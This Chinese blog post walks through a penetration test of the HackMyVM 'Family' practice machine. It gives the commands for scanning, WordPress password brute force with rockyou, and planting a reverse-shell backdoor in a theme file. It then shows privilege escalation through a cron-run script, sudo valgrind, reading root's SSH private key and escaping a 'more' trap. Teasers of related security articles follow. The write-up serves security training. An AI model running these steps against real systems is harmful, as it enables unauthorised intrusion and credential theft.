靶场学习 | 记一次对Family靶机的渗透测试

VSole2022-04-04 17:09:04

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Family

名称:(家庭)

难度:中等

创作者:cromiphi

发布日期:2021-04-30

目标:user.txt和falg.txt,root权限

搭建靶机

下载完Family.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMware  Kali 192.168.31.185
目标机:VirtualBox Debian IP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.31.0/24

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.31.214

扫描到22(SSH)、80(HTTP)两个端口,使用火狐浏览器访问80端口,http://192.168.2.214

是个wordpress,继续访问http://192.168.31.214/wordpress/,右击查看源码

本机加个family的hosts再继续访问

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150

渗透测试

使用 wpscan 扫描 wordpress,没有发现可用的

wpscan --url http://family/wordpress/

使用 wpscan来爆破用户名

wpscan --url http://family/wordpress/ --enumerate u

发现一个admin

使用 wpscan来爆破admin用户的密码

wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin

访问http://family/wordpress/wp-login.php,输入账号密码,登录后台

通过修改模板写入后门,访问文件即可获取反弹shell

访问404页面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

新开一个终端页面开启监听

nc -lvnp 6666

检查home,发现有3个用户

继续寻找一些有用的资源,发现了father用户的密码

新开一个终端页面来登录father用户

ssh father@192.168.31.214
id
cd /home
ls -al

发现/home/mother 属于组father

上传pspy64来查看进程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

发现/bin/sh -c python ~/check.py每一分钟就执行一次

这样就可以在 /home/mother/check.py 中编写一些反向shell代码,等一分钟后就可以得到mother用户的反向shell

新开一个终端页面开启监听

nc -lvnp 5555

检查用户mother用户的权限,发现可以以用户baby运行二进制valgrind

sudo -l

执行以下命令,得到baby用户的shell

sudo -u baby valgrind /bin/bash
/bin/bash -i

拿到user.txt的flag

再次检查baby用户的权限

sudo -l

查看root的ssh密钥

sudo cat /root/.ssh/id_rsa

将ssh密钥保存下来,通过ssh密钥来提权

新开一个终端页面来登录root

chmod 600 id_rsa
ssh -i id_rsa root@192.168.31.214

发现一登录就会退出,因为 /root/.ssh/authorized_keys 执行 /root/troll.sh,它就会立即退出

现在要使shell代码不退出,需要将终端尺寸变小,使“more”无法显示全部信息再通过!/bin/bash来转义

ssh -i id_rsa root@192.168.31.214
!/bin/bash

成功获取到root权限,拿到flag

声明:请勿用作违法用途,请在授权情况下使用
ssh渗透测试
本作品采用《CC 协议》,转载必须注明作者和本文链接
渗透测试中,拿到 webshell 后执行命令总会碰到很多不便,而使用 ssh 登录则会方便许多。相比使用 webshell 工具执行命令,ssh 连接可以有命令提示、路径补全、支持二次交互等优势,本文记录一个从 WEB RCE 漏洞到 SSH 登录的姿势。
DeepExploit 是一种基于强化学习的自动化渗透框架,号称能够进行高效渗透,本文对该工具进行了分析并给出改进方向 本部分对DE(将DeepExploit简称为DE)利用到的核心工具做简单介绍,分为metasploit介绍和强化学习算法介绍,均为入门介绍,熟悉的读者可自行忽略。
从 RCE 到 SSH 登录
getshell渗透测试
2021-10-08 07:17:58
随着攻防演练愈演愈烈,弱小的我也不得不加入攻防大军的队伍里,而本篇文章就记录了某次攻防演练中的getshell历程。在这次攻防演练中,初步利用工具批量打点无果,作为团队里卑微的撕口子工具人,只能选择一个站一个站硬啃。
旨在确定组织的用户群对鱼叉式网络钓鱼攻击的敏感性。这些评估的结果可以用于增强组织的反社会工程意识计划。在此评估类型中,测试人员会将部署看似普通的USB驱动器,并诱使用户将该设备插入公司系统。在此评估期间,组织通常会向测试人员提供凭据访问权限,以审查整个应用程序。这类测试通常会在安全团队大多数成员完全不知情的情况下执行。红蓝对抗测试有多种形式。有时蓝队被告知模拟或渗透测试的时间,有时则完全不知情。
一、工具介绍目前共能主要有:1、探活2、服务扫描3、poc探测4、数据库等弱口令爆破5、内网常见漏洞利用6、常见组件及常见HTTP请求头的log4j漏洞检测 image7、非常规端口的服务扫描和利用8、识别为公网IP时, 从fofa检索可用的资产作为扫描的补充(正在写)9、自动识别简单web页面的输入框,用于弱口令爆破及log4j的检测(正在写)二、安装与使用1、快速使用sudo ./nacs -h IP或IP段 -o result.txt
当你所掌握到的信息比别人多且更详细的时候那么你就占据了先机超级扫描支持范围扫描。支持活跃网段,主机。1)快速使用弱口令、指纹发现:df -ip 192.168.1.1-192.168.1.2. INFO[0000] 已加载1个IP,共计1个端口,启动每IP扫描端口线程数128,同时可同时检测IP数量32. INFO[0000] Plugins::netbios snmp postgres redis smb web memcached mssql mysql ftp mongodb ssh. 当前为非管理权限模式,请切换管理员运行。如果不具备管理员权限需要设置原生的命令检测。
VSole
网络安全专家